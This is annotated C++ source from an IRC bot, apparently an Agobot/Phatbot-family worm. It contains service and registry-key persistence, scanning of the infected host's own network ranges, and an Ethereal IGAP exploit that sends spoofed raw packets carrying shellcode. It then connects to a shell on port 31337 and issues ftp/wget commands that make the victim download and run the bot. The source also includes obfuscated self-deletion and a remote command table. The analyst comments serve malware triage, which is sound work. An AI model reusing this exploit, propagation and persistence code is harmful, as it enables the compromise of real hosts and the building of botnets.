// Registers an auto-start Windows service whose command line is
// "<sFilename>" <sParams>, then sets a restart-on-failure action on it.
// Analyst note: an auto-start service combined with a restart failure action
// is a persistence artifact; the display name comes from the as_valname cvar.
//
// sServicename: service key name passed to CreateService.
// sFilename:    executable path, wrapped in quotes in the command line.
// sParams:      arguments appended after the quoted path.
// Returns false if the SCM cannot be opened, if CreateService fails for a
// reason other than ERROR_SERVICE_EXISTS, or if the failure actions cannot be
// set. On ERROR_SERVICE_EXISTS the result is whatever ServiceAdd returns.
bool CInstaller::ServiceAddInt(CString &sServicename, CString &sFilename, CString &sParams) {
    // Full-access handle to the local service control manager.
    SC_HANDLE hServiceControl=OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, SC_MANAGER_ALL_ACCESS);
    if(!hServiceControl) return false;
    CString sSvcCmd;
    sSvcCmd.Format("\"%s\" %s", sFilename.CStr(), sParams.CStr());
    SC_HANDLE hService=CreateService(hServiceControl, sServicename.CStr(), g_pMainCtrl->m_cBot.as_valname.sValue.CStr(), SERVICE_ALL_ACCESS, \
        SERVICE_WIN32_SHARE_PROCESS, SERVICE_AUTO_START, SERVICE_ERROR_NORMAL, \
        sSvcCmd.CStr(), NULL, NULL, NULL, NULL, NULL);
    if(!hService) {
        DWORD dwError=GetLastError();
        if(dwError==ERROR_SERVICE_EXISTS) {
            // A service of that name already exists: delete it and go back
            // through ServiceAdd to create it again.
            // NOTE(review): hService is NULL on this path, so the first close
            // below has nothing to release.
            // NOTE(review): sFilename is passed back to ServiceAdd, which
            // prepends the system directory; if this call came from
            // ServiceAdd the path already carries that prefix -- confirm.
            ServiceDel(sServicename);
            CloseServiceHandle(hService);
            CloseServiceHandle(hServiceControl);
            return ServiceAdd(sServicename, sFilename);
        } else {
            CloseServiceHandle(hServiceControl);
            return false;
        }
    }
    // One failure action: restart the service. SC_ACTION::Delay is in
    // milliseconds, and a reset period of INFINITE means the failure count is
    // never reset.
    SC_ACTION scActions[1];
    scActions[0].Delay=1;
    scActions[0].Type=SC_ACTION_RESTART;
    SERVICE_FAILURE_ACTIONS sfActions;
    sfActions.dwResetPeriod=INFINITE;
    sfActions.lpRebootMsg=NULL;
    sfActions.lpCommand=NULL;
    sfActions.cActions=1;
    sfActions.lpsaActions=scActions;
    if(!ChangeServiceConfig2(hService, SERVICE_CONFIG_FAILURE_ACTIONS, &sfActions)) {
        CloseServiceHandle(hService);
        CloseServiceHandle(hServiceControl);
        return false;
    }
    CloseServiceHandle(hService);
    CloseServiceHandle(hServiceControl);
    return true;
}
// Installs <system directory>\<sFilename> as a service started with the
// "-service" argument, by delegating to ServiceAddInt.
// Returns false immediately when the controller's hash check has failed;
// otherwise returns ServiceAddInt's result.
// Analyst note: the resulting service command line is a quoted path under the
// Windows system directory followed by -service.
bool CInstaller::ServiceAdd(CString &sServicename, CString &sFilename) {
    // Fail if the hash check failed
    if(g_pMainCtrl->m_bHashCheckFailed) return false;
    CString sysdir;
    // NOTE(review): the return value of GetSystemDirectory is not checked.
    GetSystemDirectory(sysdir.GetBuffer(MAX_PATH), MAX_PATH);
    CString sSvcCmd;
    sSvcCmd.Format("%s\\%s", sysdir.CStr(), sFilename.CStr());
    CString sSvcParams;
    sSvcParams.Format("-service");
    return ServiceAddInt(sServicename, sSvcCmd, sSvcParams);
}
// Variant of ServiceAdd without the hash-check guard: installs
// <system directory>\<sFilename> as a service started with the "-netsvcs"
// argument, by delegating to ServiceAddInt, and returns its result.
// Analyst note: the resulting service command line is a quoted path under the
// Windows system directory followed by -netsvcs.
bool CInstaller::ServiceAdd(CString &sServicename, CString &sFilename) {
    CString sysdir;
    // NOTE(review): the return value of GetSystemDirectory is not checked.
    GetSystemDirectory(sysdir.GetBuffer(MAX_PATH), MAX_PATH);
    CString sSvcCmd;
    sSvcCmd.Format("%s\\%s", sysdir.CStr(), sFilename.CStr());
    CString sSvcParams;
    sSvcParams.Format("-netsvcs");
    return ServiceAddInt(sServicename, sSvcCmd, sSvcParams);
}
// Authenticates an IRC user against the stored user table and, on success,
// appends a login record to llStart.
//
// sUsername:    account name looked up with FindUser.
// sPassword:    clear-text password, verified by CheckPassword.
// sIRCUsername: IRC identity; a second login for the same identity is refused.
// sHost:        caller's host; compared with the stored host only when non-empty.
// sIdentd:      caller's identd; compared with the stored identd only when non-empty.
// Returns true when a login record was added, false otherwise.
// NOTE(review): Compare() is assumed to follow the strcmp convention (0 on
// equality) -- confirm. Under that reading an empty sHost or sIdentd skips the
// corresponding check, so the password alone decides.
bool CMac::AddLogin(CString sUsername, CString sPassword, CString sIRCUsername, CString sHost, CString sIdentd) {
    if(FindLogin(sIRCUsername)) return false;
    user *pUser=FindUser(sUsername);
    if(!pUser) return false;
    // The pUser test is redundant after the early return above.
    if(pUser) if(CheckPassword(sPassword, pUser)) {
        if(sHost.Compare("")) if(strcmp(sHost.CStr(), pUser->sHost.CStr())!=0) return false;
        if(sIdentd.Compare("")) if(strcmp(sIdentd.CStr(), pUser->sIdentd.CStr())!=0) return false;
        // The record is heap-allocated; DelLogin is the visible place that frees it.
        login *pLogin=new login;
        pLogin->pUser=pUser;
        pLogin->sUsername=sUsername;
        pLogin->sIRCUsername=sIRCUsername;
        llStart.push_back(pLogin);
        return true;
    }
    return false;
}
// Removes the autostart value sValuename from both
// HKLM\Software\Microsoft\Windows\CurrentVersion\Run and
// HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices.
// Always returns true: none of the registry calls is checked.
// NOTE(review): RegCreateKeyEx creates the key when it is missing, so calling
// this on a clean system can leave an empty RunServices key behind.
bool CInstaller::RegStartDel(CString &sValuename) {
    HKEY key;
    RegCreateKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL);
    RegDeleteValue(key, sValuename.CStr());
    RegCloseKey(key);
    RegCreateKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\RunServices", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL);
    RegDeleteValue(key, sValuename.CStr());
    RegCloseKey(key);
    return true;
}
// Writes an autostart entry named sValuename with data sFilename (REG_SZ)
// under both HKLM\Software\Microsoft\Windows\CurrentVersion\Run and
// HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices.
// Returns false only when the controller's hash check has failed; otherwise
// returns true without checking any registry call.
// Analyst note: the same value name appearing under both keys is the
// persistence artifact this routine leaves.
// NOTE(review): the data length is strlen(sFilename), which leaves out the
// terminating NUL that REG_SZ data normally includes.
bool CInstaller::RegStartAdd(CString &sValuename, CString &sFilename) {
    // Fail if the hash check failed
    if(g_pMainCtrl->m_bHashCheckFailed) return false;
    HKEY key;
    RegCreateKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL);
    RegSetValueEx(key, sValuename.CStr(), 0, REG_SZ, (LPBYTE)(const char *)sFilename.CStr(), (DWORD)strlen(sFilename));
    RegCloseKey(key);
    RegCreateKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\RunServices", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL);
    RegSetValueEx(key, sValuename.CStr(), 0, REG_SZ, (LPBYTE)(const char *)sFilename.CStr(), (DWORD)strlen(sFilename));
    RegCloseKey(key);
    return true;
}
// Opens a TCP connection to an SMTP server and waits for its greeting.
//
// sHost: server host name or address.
// iPort: server port.
// Returns true once a reply starting with "220" has been received; false if
// already connected, if the connect fails, if the receive fails, or if the
// greeting starts with anything else. On the last two paths Disconnect() is
// called before returning.
// NOTE(review): the reply is read with a single Recv of up to 8192 bytes and
// only its first three characters are examined.
bool CSMTP_Connection::Connect(CString sHost, int iPort) {
    // Fail if already connected
    if(m_sServerSocket.IsConnected() || m_bConnected) return false;
    // Connect to the server
    if(!m_sServerSocket.Connect(sHost.CStr(), iPort)) {
        // Connection failed
#ifdef DBGCONSOLE
        g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
            "Failed to connect to \"%s:%d\"!\n", this, sHost.CStr(), iPort);
#endif // DBGCONSOLE
        return false;
    }
    // Store server address in member variables
    m_sServerHost.Assign(sHost);
    m_iServerPort=iPort;
#ifdef DBGCONSOLE
    g_pMainCtrl->m_cConsDbg.Log(3, "CSMTP_Connection(0x%8.8Xh): "
        "Connected to \"%s:%d\"!\n", this, m_sServerHost.CStr(), m_iServerPort);
#endif // DBGCONSOLE
    // Receive banner
    CString sRecvBuf;
    if(!m_sServerSocket.Recv(sRecvBuf.GetBuffer(8192), 8192)) {
        // Connection reset
#ifdef DBGCONSOLE
        g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
            "Connection reset!\n", this);
#endif // DBGCONSOLE
        Disconnect();
        return false;
    }
    // Check if connection was accepted
    if(sRecvBuf.Mid(0, 3).Compare("220")) {
        // Connection not accepted
#ifdef DBGCONSOLE
        g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
            "Server rejected connection!\n", this);
#endif // DBGCONSOLE
        Disconnect();
        return false;
    }
    // Set connection status to true and return true
    m_bConnected=true;
    return true;
}
// Removes one login record from llStart and frees it.
//
// sUsername:    account name to match.
// sIRCUsername: IRC identity to match.
// Returns true if a record was removed, false if none matched or if
// sUsername has no backing string.
// NOTE(review): a record matches when EITHER name is equal (Compare() is
// assumed to return 0 on equality -- confirm), and the loop keeps the LAST
// match, so only one record is removed per call.
bool CMac::DelLogin(CString sUsername, CString sIRCUsername) {
    if(!sUsername.CStr()) return false;
    login *pRemove=NULL;
    list<login*>::iterator i;
    for(i=llStart.begin(); i!=llStart.end(); ++i) {
        if(!(*i)->sUsername.Compare(sUsername) || !(*i)->sIRCUsername.Compare(sIRCUsername)) pRemove=(*i);
    }
    if(pRemove) {
        // Unlink first, then free, so the list never holds a dangling pointer.
        llStart.remove(pRemove);
        delete pRemove;
        return true;
    }
    return false;
}
// Queues the host's own network neighbourhood for scanning: once the IRC
// session is joined and a local IP string is available, it registers three
// ranges derived from that address -- a.b.c.0/24 (priority 80), a.b.0.0/16
// (priority 90) and a.0.0.0/8 (priority 100).
// Analyst note: a host that starts probing its own /24, then /16, then /8 is
// the network-side pattern this routine produces.
// NOTE(review): the two leading loops poll once per second with no timeout.
void CPortScanner::AddLocalLAN() {
    while(!g_pMainCtrl->m_cIRC.m_bJoined) { Sleep(1000); }
    while(!g_pMainCtrl->m_cIRC.m_sLocalIp.CStr()) { Sleep(1000); }
    CString sLocalIp = g_pMainCtrl->m_cIRC.m_sLocalIp;
    // NOTE(review): this compares two pointers, not string contents, so it is
    // not an emptiness test; if CStr() returns const char* it is presumably
    // never true -- confirm.
    while (sLocalIp.CStr() == "") Sleep(1000);
    // Split the dotted quad; atoi yields 0 for a missing or non-numeric part.
    int iLocalPart1=atoi(sLocalIp.Token(0, ".").CStr());
    int iLocalPart2=atoi(sLocalIp.Token(1, ".").CStr());
    int iLocalPart3=atoi(sLocalIp.Token(2, ".").CStr());
    // iLocalPart4 is parsed but not used below.
    int iLocalPart4=atoi(sLocalIp.Token(3, ".").CStr());
    // a.b.c.0/24
    // The ranges are heap-allocated and handed to RegisterNetRange; who frees
    // them is not visible here.
    CNetRange *nRange=new CNetRange;
    nRange->iPart1=iLocalPart1;
    nRange->iPart2=iLocalPart2;
    nRange->iPart3=iLocalPart3;
    nRange->iPart4=0;
    nRange->iNetMask=24;
    nRange->iPriority=80;
    nRange->bNotice=false;
    nRange->bSilent=false;
    nRange->sReplyTo.Assign("");
    nRange->pScanner=&g_pMainCtrl->m_cScanner;
    RegisterNetRange(nRange);
    // a.b.0.0/16
    nRange=new CNetRange;
    nRange->iPart1=iLocalPart1;
    nRange->iPart2=iLocalPart2;
    nRange->iPart3=0;
    nRange->iPart4=0;
    nRange->iNetMask=16;
    nRange->iPriority=90;
    nRange->bNotice=false;
    nRange->bSilent=false;
    nRange->sReplyTo.Assign("");
    nRange->pScanner=&g_pMainCtrl->m_cScanner;
    RegisterNetRange(nRange);
    // a.0.0.0/8
    nRange=new CNetRange;
    nRange->iPart1=iLocalPart1;
    nRange->iPart2=0;
    nRange->iPart3=0;
    nRange->iPart4=0;
    nRange->iNetMask=8;
    nRange->iPriority=100;
    nRange->bNotice=false;
    nRange->bSilent=false;
    nRange->sReplyTo.Assign("");
    nRange->pScanner=&g_pMainCtrl->m_cScanner;
    RegisterNetRange(nRange);
}
// Counts running processes that look like a copy of this program.
//
// WIN32: walks a process snapshot and counts entries whose image name either
// matches the tail of this module's own file name or is a prefix of
// sFilename. Returns that count, or 0 when the toolhelp function pointers are
// not resolved or the snapshot fails. psnap and pe32 are not declared in this
// block.
// Otherwise: runs "ps ax | grep <sFilename>" through the shell into a file
// named psaxtemp in the current directory and returns 1 if that file is
// non-empty, else 0 -- a yes/no answer rather than a count.
// Analyst note: on non-Windows hosts a stray psaxtemp file in the working
// directory is an artifact of this routine.
int GetCopies(CString &sFilename) {
#ifdef WIN32
    char cFilename[MAX_PATH];
    GetModuleFileName(GetModuleHandle(NULL), cFilename, sizeof(cFilename));
    if(fCreateToolhelp32Snapshot && fProcess32First && fProcess32Next) {
        // 2 is the value of TH32CS_SNAPPROCESS.
        psnap=fCreateToolhelp32Snapshot(2, 0);
        if(psnap!=INVALID_HANDLE_VALUE) {
            int copies=0;
            pe32.dwSize=sizeof(PROCESSENTRY32);
            if(fProcess32First(psnap, &pe32)) {
                do {
                    // NOTE(review): if szExeFile is longer than cFilename the
                    // pointer arithmetic below lands before the buffer.
                    // The second test only compares strlen(szExeFile) bytes,
                    // so a process name that is a prefix of sFilename counts
                    // as a match.
                    if((strncmp(cFilename+(strlen(cFilename)-strlen(pe32.szExeFile)), \
                        pe32.szExeFile, strlen(pe32.szExeFile))==0) || \
                        (strncmp(sFilename, pe32.szExeFile, strlen(pe32.szExeFile))==0)) copies++;
                } while(fProcess32Next(psnap, &pe32));
            }
            CloseHandle(psnap);
            return copies;
        } else return 0;
    } else return 0;
#else
    char szCmdBuf[4096];
    // NOTE(review): sFilename is interpolated into a shell command unquoted
    // and unbounded, so shell metacharacters in it are interpreted by the
    // shell and a long name overruns szCmdBuf.
    sprintf(szCmdBuf, "ps ax | grep %s | grep -v grep > psaxtemp", sFilename.CStr());
    system(szCmdBuf);
    FILE *fp=fopen("psaxtemp", "r");
    if(!fp) return 0;
    fseek(fp, 0, SEEK_END);
    long lFileSize=ftell(fp);
    fseek(fp, 0, SEEK_SET);
    // NOTE(review): this early return skips both fclose and the rm below, so
    // the handle leaks and psaxtemp stays on disk whenever a match is found.
    if(lFileSize>0) return 1;
    fclose(fp);
    system("rm -f psaxtemp");
    return 0;
#endif // WIN32
}
// Builds one raw IPv4 packet carrying an IGAP header and payload for the
// targets[] entry at iOffset, and sends it MAX_PACKET times to
// m_sSocket.m_szHost.
// Returns false if the raw socket cannot be created or configured, or if
// either address fails to parse; true after the send loop, whose individual
// sendto results are not checked.
// Analyst note: traffic produced here has IP protocol IPPROTO_IGAP, a TTL of
// 1 and a source address drawn at random per call, so the source field of a
// captured packet does not identify the sender.
// targets, shellcode_firsthalf, shellcode_secondhalf, jumpcode, RETOFFSET,
// PAYLOAD_SIZE, MAX_BUFF and MAX_PACKET are defined outside this block.
bool CScannerEthereal::ExploitInt(int iOffset) {
    char buffer[MAX_BUFF];
    // The IP header sits at the start of the buffer, the IGAP header right after it.
    ipheader *iphdr=(ipheader*)buffer;
    igap_header *igaphdr=(igap_header*)(buffer+sizeof(ipheader));
    unsigned long magic=targets[iOffset].ret;
    CString sRandomIp;
    int one=1;
    const int *val=&one;
    sockaddr_in sin;
    memset(buffer, 0x00, MAX_BUFF);
    // Raw socket with IP_HDRINCL: the caller supplies the whole IP header.
    int sockfd=socket(PF_INET, SOCK_RAW, IPPROTO_RAW);
    if(sockfd==SOCKET_ERROR) return false;
    if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, val, sizeof(one))<0) { close(sockfd); return false; }
    init_random();
    sRandomIp.Format("%d.%d.%d.%d", brandom(0, 255), brandom(0, 255), brandom(0, 255), brandom(0, 255));
    sin.sin_addr.s_addr=inet_addr(m_sSocket.m_szHost);
    sin.sin_family=AF_INET;
    sin.sin_port=0x00;
    // IP header fields.
    iphdr->ip_hl=0x05;
    iphdr->ip_v=0x04;
    iphdr->ip_tos=0x00;
    iphdr->ip_len=MAX_BUFF;
    iphdr->ip_id=htonl(54321);
    iphdr->ip_off=0x00;
    iphdr->ip_ttl=0x01;
    iphdr->ip_proto=IPPROTO_IGAP;
    iphdr->ip_sum=0x00;
    iphdr->ip_src=inet_addr(sRandomIp.CStr());
    iphdr->ip_dst=inet_addr(m_sSocket.m_szHost);
    if(iphdr->ip_src==SOCKET_ERROR || iphdr->ip_dst==SOCKET_ERROR) { close(sockfd); return false; }
    // IGAP header fields.
    igaphdr->igap_type=0x41;
    igaphdr->igap_restime=0x0a;
    igaphdr->igap_cksum=0x00;
    igaphdr->igap_gaddr=0x00;
    igaphdr->igap_ver=0x01;
    igaphdr->igap_stype=0x21;
    igaphdr->igap_reserved1=0x00;
    igaphdr->igap_cid=0x00;
    igaphdr->igap_asize=0x10;
    igaphdr->igap_msgsize=0x40+PAYLOAD_SIZE;
    igaphdr->igap_reserved2=0x00;
    // Payload: 0x90 filler, then the code fragments and the per-target value
    // from targets[] copied in at offsets derived from RETOFFSET and
    // PAYLOAD_SIZE.
    memset(igaphdr->igap_payload, 0x90, 16+64+PAYLOAD_SIZE);
    memcpy(igaphdr->igap_payload+16+RETOFFSET-strlen(shellcode_firsthalf)-8, shellcode_firsthalf, strlen(shellcode_firsthalf));
    memcpy(igaphdr->igap_payload+16+64+RETOFFSET-strlen(jumpcode)-4, jumpcode, strlen(jumpcode));
    memcpy(igaphdr->igap_payload+16+64+RETOFFSET, &magic, 4);
    magic-=0x10;
    memcpy(igaphdr->igap_payload+16+64+RETOFFSET-4, &magic, 4);
    memcpy(igaphdr->igap_payload+16+64+PAYLOAD_SIZE-strlen(shellcode_secondhalf)-1, shellcode_secondhalf, strlen(shellcode_secondhalf));
    // Checksums are computed last, over the finished headers.
    igaphdr->igap_cksum=checksum((unsigned short*)(buffer+sizeof(struct ipheader)), (sizeof(struct igap_header))>>1);
    iphdr->ip_sum=checksum((unsigned short*)buffer, (iphdr->ip_len)>>1);
    // 'one' is reused as the send counter.
    one=MAX_PACKET;
    while(one) {
        sendto(sockfd, buffer, MAX_BUFF, 0, (sockaddr*)&sin, sizeof(sin));
        one--;
    }
    close(sockfd);
    return true;
}
// Calls ExploitInt for target indices 0 through 3 against m_sSocket.m_szHost,
// then tries to connect to TCP port 31337 on that host. If the connection
// succeeds it writes shell commands that make the remote side fetch a file
// named "bot" from this host's FTP port (bot_ftrans_port_ftp) and execute it.
// Returns false without sending anything when the local address is public
// and the target is private, or when not running as uid 0; otherwise returns
// whether the connection to port 31337 succeeded. The ExploitInt results are
// ignored.
// Analyst note: indicators visible in this block are the outbound connection
// to TCP 31337, the ftp login "ftp"/"bla", the URL form
// ftp://bla:bla@<host>:<port>/bot and the "chmod 777 ./bot" command.
bool CScannerEthereal::Exploit() {
    if(!IsPrivate(g_pMainCtrl->m_pIRC->m_sLocalIp.CStr()) && IsPrivate(m_sSocket.m_szHost)) return false;
    // We need root to exploit this cause we need to spoof packets
    if(getuid()) return false;
    ExploitInt(0);
    ExploitInt(1);
    ExploitInt(2);
    ExploitInt(3);
    CSocket sShellSocket;
    if(sShellSocket.Connect(m_sSocket.m_szHost, 31337)) {
        CString sCmdBuf;
        // Read whatever arrives first, with a timeout argument of 2000.
        sShellSocket.RecvTO(sCmdBuf.GetBuffer(8192), 8192, 2000);
        // First transfer attempt: the command-line ftp client.
        sCmdBuf.Format("echo -e open %s %d\\nuser ftp bla\\nget bot\\nquit\\n | ftp -n\n", g_pMainCtrl->m_pIRC->m_sLocalHost.CStr(), g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue);
        sShellSocket.Write(sCmdBuf.CStr(), sCmdBuf.GetLength());
        sShellSocket.Recv(sCmdBuf.GetBuffer(8192), 8192);
        // Second transfer attempt: wget against the same FTP endpoint.
        sCmdBuf.Format("wget ftp://bla:bla@%s:%d/bot\n", g_pMainCtrl->m_pIRC->m_sLocalHost.CStr(), g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue);
        sShellSocket.Write(sCmdBuf.CStr(), sCmdBuf.GetLength());
        sShellSocket.Recv(sCmdBuf.GetBuffer(8192), 8192);
        sCmdBuf.Assign("chmod 777 ./bot ; ./bla\n");
        sShellSocket.Write(sCmdBuf.CStr(), sCmdBuf.GetLength());
        sShellSocket.Recv(sCmdBuf.GetBuffer(8192), 8192);
        sShellSocket.Disconnect();
        return true;
    } else return false;
}
// Verifies a clear-text password against a stored hash: computes the MD5 of
// sPassword, renders it as 32 upper-case hex digits and compares that string
// with pUser->sPassword.
// Returns true on a match (Compare() returning 0), false otherwise or when
// sPassword has no backing string.
// NOTE(review): the digest is plain MD5 with no salt and no iteration, and the
// comparison goes through Compare(); whether that comparison is case-sensitive
// or constant-time is not visible here.
// NOTE(review): pUser is dereferenced without a null check.
bool CMac::CheckPassword(CString sPassword, user *pUser) {
    if(!sPassword.CStr()) return false;
    md5::MD5_CTX md5;
    md5::MD5Init(&md5);
    unsigned char szMD5[16];
    CString sMD5;
    sMD5.Assign("");
    md5::MD5Update(&md5, (unsigned char*)sPassword.Str(), sPassword.GetLength());
    md5::MD5Final(szMD5, &md5);
    // Hex-encode the 16 digest bytes, two upper-case digits per byte.
    for(int i=0;i<16;i++) {
        CString sTemp;
        sTemp.Format("%2.2X", szMD5[i]);
        sMD5.Append(sTemp);
    }
    if(!pUser->sPassword.Compare(sMD5)) return true;
    return false;
}
// Self-removal. On WIN32 it writes a batch file into the temp directory and
// launches it detached through %comspec% with this module's own path as
// argument; per the inline comments the batch loops deleting that path until
// it no longer exists and then deletes itself. The non-Windows branch is
// empty. Always returns true; no API result is checked apart from the
// CreateFile handle test.
// Analyst note: every script line is assembled from dp(...) calls rather than
// string literals, so the batch text does not appear in the binary as plain
// strings. Artifacts are a short-lived batch file in %TEMP% and a hidden
// "%comspec% /c <batch> <module path>" child process. By the letter mapping
// the inline comments imply, the batch name decodes to "afro.bat" -- confirm
// against dp().
bool CInstaller::Uninstall() {
#ifdef WIN32
    HANDLE f;
    DWORD r;
    PROCESS_INFORMATION pinfo;
    STARTUPINFO sinfo;
    char cmdline[MAX_PATH];
    char tcmdline[MAX_PATH];
    char cfilename[MAX_PATH];
    char batfile[MAX_PATH];
    char tempdir[MAX_PATH];
    GetModuleFileName(GetModuleHandle(NULL), cfilename, sizeof(cfilename));
    GetTempPath(sizeof(tempdir), tempdir);
    sprintf(batfile, "%s\\%s", tempdir, dp(1,6,18,15,79,2,1,20,0).CStr());
    f = CreateFile(batfile, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0);
    // NOTE(review): CreateFile reports failure as INVALID_HANDLE_VALUE, not 0;
    // this test compares the handle against 0.
    if (f > (HANDLE)0) {
        // write a batch file to remove our executable once we close
        /*WriteFile(f, "@echo off\r\n" ":start\r\nif not exist \"\"%1\"\" goto done\r\n" "del /F \"\"%1\"\"\r\n" "del \"\"%1\"\"\r\n" "goto start\r\n" ":done\r\n" "del /F %temp%\r.bat\r\n" "del %temp%\r.bat\r\n", 105, &r, NULL);*/
        CString sBat;
        // NOTE(review): the format string has ten %s conversions but eleven
        // arguments follow.
        sBat.Format("%s\r\n%s\r\n%s\r\n%s\r\n%s\r\n%s\r\n%s\r%s\r\n%s\r%s\r\n",
            dp(86,5,3,8,15,78,15,6,6,0).CStr(), // @echo off
            dp(83,19,20,1,18,20,0).CStr(), // :start
            // if not exist ""%1"" goto done
            dp(9,6,78,14,15,20,78,5,24,9,19,20,78,84,84,57,69,84,84,78,7,15,20,15,78,4,15,14,5,0).CStr(),
            dp(4,5,12,78,82,32,78,84,84,57,69,84,84,0).CStr(), // del /F ""%1""
            dp(4,5,12,78,84,84,57,69,84,84,0).CStr(), // del ""%1""
            dp(7,15,20,15,78,19,20,1,18,20,0).CStr(), // goto start
            dp(83,4,15,14,5,0).CStr(), // :done
            dp(4,5,12,78,82,32,78,57,20,5,13,16,57,0).CStr(), // del /F %temp%
            dp(79,2,1,20,0).CStr(), // .bat
            dp(4,5,12,78,57,20,5,13,16,57,0).CStr(), // del %temp%
            dp(79,2,1,20,0).CStr()); // .bat
        // The write length is the fixed value 105, not the length of sBat.
        WriteFile(f, sBat.CStr(), 105, &r, NULL);
        CloseHandle(f);
        memset(&sinfo, 0, sizeof(STARTUPINFO));
        sinfo.cb = sizeof(sinfo);
        sinfo.wShowWindow = SW_HIDE;
        GetModuleFileName(GetModuleHandle(NULL), cfilename, sizeof(cfilename));// get our file name
        sprintf(tcmdline, "%%comspec%% /c %s %s", batfile, cfilename); // build command line
        ExpandEnvironmentStrings(tcmdline, cmdline, sizeof(cmdline)); // put the name of the command interpreter into the command line
        // execute the batch file
        CreateProcess(NULL, cmdline, NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo);
    }
#else
    // Linux
#endif // WIN32
    return true;
}
// Reports whether a service named sServicename can be opened on the local
// machine.
// Returns true if both the SCM and the service open with full access, false
// otherwise.
// NOTE(review): because SC_MANAGER_ALL_ACCESS and SERVICE_ALL_ACCESS are
// requested, a caller without those rights gets false even when the service
// exists.
bool CInstaller::IsInstalled(CString &sServicename) {
    SC_HANDLE hServiceControl=OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, SC_MANAGER_ALL_ACCESS);
    if(!hServiceControl) return false;
    SC_HANDLE hService=OpenService(hServiceControl, sServicename.CStr(), SERVICE_ALL_ACCESS);
    if(!hService) {
        CloseServiceHandle(hServiceControl);
        return false;
    }
    // Opening succeeded; the handles were only needed for the probe.
    CloseServiceHandle(hService);
    CloseServiceHandle(hServiceControl);
    return true;
}
// Stops and deletes the local service named sServicename.
// Returns false if the SCM or the service cannot be opened; otherwise true,
// regardless of whether the stop request or the deletion succeeded (neither
// result is checked).
bool CInstaller::ServiceDel(CString &sServicename) {
    SC_HANDLE hServiceControl=OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, SC_MANAGER_ALL_ACCESS);
    if(!hServiceControl) return false;
    SC_HANDLE hService=OpenService(hServiceControl, sServicename.CStr(), SERVICE_ALL_ACCESS);
    if(!hService) {
        CloseServiceHandle(hServiceControl);
        return false;
    }
    // Ask the service to stop, then mark it for deletion.
    SERVICE_STATUS sStatus;
    ControlService(hService, SERVICE_CONTROL_STOP, &sStatus);
    DeleteService(hService);
    CloseServiceHandle(hService);
    CloseServiceHandle(hServiceControl);
    return true;
}
// Initialises the bot object: registers its configuration variables and its
// remote command handlers, picks a nickname and records the start time.
// The two file-transfer ports default to random values from brandom(500, 22226),
// and the si_* server variables are registered empty before Config() runs.
// Analyst note: the REGCMD table below is the "bot.*" command vocabulary this
// build accepts; the command names are useful strings when triaging captured
// command-and-control traffic or a memory image.
// REGCVAR and REGCMD are macros defined outside this block; the meaning of
// their trailing arguments is not visible here.
void CBot::Init() {
    init_random();
    CString sTemp;
    sTemp.Format("%d", brandom(500, 22226));
    CString sTempFTP;
    sTempFTP.Format("%d", brandom(500, 22226));
    REGCVAR(bot_ftrans_port, sTemp.CStr(), "Bot - File Transfer Port", false, false, 0 );
    REGCVAR(bot_ftrans_port_ftp, sTempFTP.CStr(), "Bot - File Transfer Port for FTP", false, false, 0 );
    REGCVAR(si_chanpass, "", "Server Info - Channel Password", false, false, 0 );
    REGCVAR(si_mainchan, "", "Server Info - Main Channel", false, false, 0 );
    REGCVAR(si_nickprefix, "", "Server Info - Nickname prefix", false, false, 0 );
    REGCVAR(si_port, "", "Server Info - Server Port", false, false, 0 );
    REGCVAR(si_server, "", "Server Info - Server Address", false, false, 0 );
    REGCVAR(si_servpass, "", "Server Info - Server Password", false, false, 0 );
    REGCVAR(si_usessl, "", "Server Info - Use SSL ?", false, false, 0 );
    Config();
    REGCMD(m_cmdAbout, "bot.about", "...", false, this);
    REGCMD(m_cmdDie, "bot.die", "terminates the bot", false, this);
    REGCMD(m_cmdDns, "bot.dns", "resolves ip/hostname by dns", false, this);
    REGCMD(m_cmdExecute, "bot.execute", "makes the bot execute a .exe", false, this);
    REGCMD(m_cmdId, "bot.id", "displays the id of the current code", false, this);
    REGCMD(m_cmdNick, "bot.nick", "changes the nickname of the bot", false, this);
    REGCMD(m_cmdOpen, "bot.open", "opens a file (whatever)", false, this);
    REGCMD(m_cmdRemove, "bot.remove", "removes the bot", false, this);
    REGCMD(m_cmdRemoveAllBut, "bot.removeallbut", "removes the bot if id does not match", false, this);
    REGCMD(m_cmdRndNick, "bot.rndnick", "makes the bot generate a new random nick", false, this);
    REGCMD(m_cmdStatus, "bot.status", "gives status", false, this);
    REGCMD(m_cmdSysInfo, "bot.sysinfo", "displays the system info", false, this);
    REGCMD(m_cmdLongUptime, "bot.longuptime", "If uptime > 7 days then bot will respond", false, this);
    REGCMD(m_cmdQuit, "bot.quit", "quits the bot", false, this);
    REGCMD(m_cmdFlushDNS, "bot.flushdns", "flushes the bots dns cache", false, this);
    REGCMD(m_cmdSecure, "bot.secure", "delete shares / disable dcom", false, this);
    REGCMD(m_cmdUnSecure, "bot.unsecure", "enable shares / enable dcom", false, this);
